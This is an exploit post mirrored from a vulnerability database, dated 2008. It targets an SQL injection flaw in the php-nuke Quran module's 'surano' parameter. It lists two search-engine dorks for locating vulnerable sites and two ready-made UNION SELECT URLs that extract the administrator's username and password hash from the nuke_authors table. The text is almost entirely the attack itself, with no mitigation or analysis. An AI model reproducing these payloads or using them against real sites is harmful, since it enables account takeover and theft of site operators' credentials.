Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:19260
HistoryFeb 24, 2008 - 12:00 a.m.

php-nuke Quran SQL Injection(surano)

2008-02-2400:00:00
vulners.com
10

###############################################################

php-nuke Quran SQL Injection(surano)

###############################################################

AUTHOR : S@BUN

HOME : http://www.milw0rm.com/author/1334

MAİL : [email protected]

################################################################

DORK 1 : allinurl: "modules php name Quran"surano

DORK 2 : allinurl: "modules php name Quran"

################################################################
EXPLOIT :

admin

modules.php?name=Quran&action=viewayat&surano=-9999//union//select//000,aid,222,333,444//from/**/nuke_authors/*where%20admin1

pass

modules.php?name=Quran&action=viewayat&surano=-9999//union//select//000,pwd,222,333,444//from/**/nuke_authors/*where%20admin1

################################################################

S@BUN i AM NOT HACKER S@BUN

################################################################